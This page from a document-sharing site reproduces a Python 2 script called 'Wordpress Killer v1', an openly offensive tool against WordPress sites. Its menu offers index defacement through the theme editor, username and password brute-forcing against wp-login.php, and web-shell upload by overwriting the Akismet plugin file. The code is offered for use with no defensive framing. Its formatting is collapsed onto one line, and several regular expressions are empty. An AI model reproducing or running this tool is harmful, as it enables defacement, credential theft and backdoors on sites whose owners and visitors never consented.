wordpress killer v1 [ python ]
![Download Wordpress Killer v1 [ Python ]](https://vdocuments.site/public/t1/desktop/images/cloud_download_icon2.png)
If you can't read please download the document
DESCRIPTION
Pela Jar and Arik on Tess EoTRANSCRIPT
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184#!/usr/bin/env python# -*- coding: utf-8 -*-import urllib, urllib2, cookielib, re , sys , os if os.name == 'nt': os.system('cls') # Windowselse: os.system('clear') # Linuxdef welcome(): print''' |====================================| |========= [ FoX HaCkEr ] ==========| |====== [ [email protected] ] =========| |=====[ http://www.sec4ever.com ]====| |====================================| | Wordpress Killer v1 | |====================================| ''' print "[1] Change Index\n" print "[2] BruteForce UserName\n" print "[3] BruteForce PassWord\n" print "[4] UploaD Shell \n" def changeindex(): try: site = raw_input("EnTer site : ") username = raw_input("UserName : ") password = raw_input("Password : ") pathindex = raw_input("Path index :") index = open(pathindex,'r').read() sec4ever = cookielib.CookieJar() fox = urllib2.build_opener(urllib2.HTTPCookieProcessor(sec4ever)) login_data = urllib.urlencode({'log':username,'pwd':password,'rememberme':'forever','wp-submit':'1'}) fox.open('http://'+site+'/wp-login.php', login_data) mkq = fox.open('http://'+site+'/wp-admin/theme-editor.php', login_data).read().replace('&','&').replace('%2F','/') find = re.findall('',mkq) for i in range(len(find)): fox1 = find[i] find2 = re.findall('index.php&(.*?)">',mkq) for b in range(len(find2)): fox2 = find2[b] sec = fox1.split('/') theme = '/wp-admin/theme-editor.php?file=/themes/'+sec[2]+'/index.php&'+fox2 session = "http://"+site+"/wp-admin/theme-editor.php?file=/themes/"+sec[2] +"/index.php&"+ fox2 opsession = fox.open(session).read() wordpress = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',opsession) for wp2 in range(len(wordpress)): var = wordpress[wp2] lpop = urllib.urlencode({'_wpnonce':var,'_wp_http_referer':theme,'newcontent':index,'action':'update','scrollto':'0','submit':'1'}) press = fox.open(session, lpop).read() findindexhello = re.search(index, press) if findindexhello: print "Site Is Hacked ....\n" else: print "Error\n" except IOError: print "Error\n" def BruteForceUsername(): a = raw_input("InTer Site Here : ") lists = raw_input("wordlist :") file_user = open(lists).readlines() for i in range(len(file_user)): coms = file_user[i].replace('\n','') try: # The password you entered for the username admin urls = urllib2.Request('http://'+a+'/wp-login.php') enco = urllib.urlencode({'log':coms,'pwd':'123123123','wp-submit':'1'}) inpu = urllib2.urlopen(urls, enco) data = inpu.read() find_u = re.findall("The password you entered for the username "+str(coms)+"",data) or re.findall("Incorrect password",data) if find_u: print "User is : "+coms elif not find_u: print "[-] Not FounD" except IOError: pass def BruteforcePassWord(): rae = raw_input("Enter Site here : ") user = raw_input("Enter UserName : ") passs = raw_input("PassLisT : ") opens = open(passs,'r') for z in opens.readlines(): sss = (z.rstrip()) data = { 'log' : user , 'pwd' : sss } request = urllib2.Request('http://'+rae+'/wp-login.php') request.add_data(urllib.urlencode(data)) page = urllib2.urlopen(request) if re.search("ERROR",page.read()): print "[-] NoT FounD : " +sss else: print "[+] FounD PassWord : "+sss break def UpLoadShell(): try: site5 = raw_input("EnTer site : ") username5 = raw_input("UserName : ") password5 = raw_input("Password : ") pathshell = raw_input("Path your shell in your pc : ") shell = open(pathshell,'r').read() sec4ever5 = cookielib.CookieJar() fox5 = urllib2.build_opener(urllib2.HTTPCookieProcessor(sec4ever5)) login_data5 = urllib.urlencode({'log':username5,'pwd':password5,'rememberme':'forever','wp-submit':'1'}) fox5.open('http://'+site5+'/wp-login.php', login_data5) mkq5 = fox5.open('http://'+site5+'/wp-admin/plugin-editor.php', login_data5).read().replace('&','&').replace('%2F','/') find5 = re.findall('',mkq5) for a in range(len(find5)): fox4 = find5[a] find2 = re.findall('akismet.php&(.*?)">',mkq5) for b in range(len(find2)): fox2 = find2[b] sec = fox4.split('/') theme = '/wp-admin/plugin-editor.php?file=/akismet/akismet.php&' session = "http://"+site5+"/wp-admin/plugin-editor.php?file=/akismet/akismet.php&" opsession = fox5.open(session).read() wordpress = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',opsession) for wp3 in range(len(wordpress)): var3 = wordpress[wp3] lpop3 = urllib.urlencode({'_wpnonce':var3,'_wp_http_referer':theme,'newcontent':shell,'action':'update','scrollto':'0','submit':'1'}) ope = urllib2.urlopen('http://'+site5+'/wp-content/plugins/akismet/akismet.php').read() if re.search('home',ope): print "\nDone Go To This PATH [+]--> "+site5+"/wp-content/plugins/akismet/akismet.php\n" else: print "Error\n" except IOError: print " Error\n" # print welcome()killer = raw_input("Inter Number : ") if killer == '1': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print changeindex() sys.exit(1)elif killer == '2': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print BruteForceUsername() sys.exit(1) elif killer == '3': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print BruteforcePassWord() sys.exit(1) elif killer == '4': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print UpLoadShell() sys.exit(1)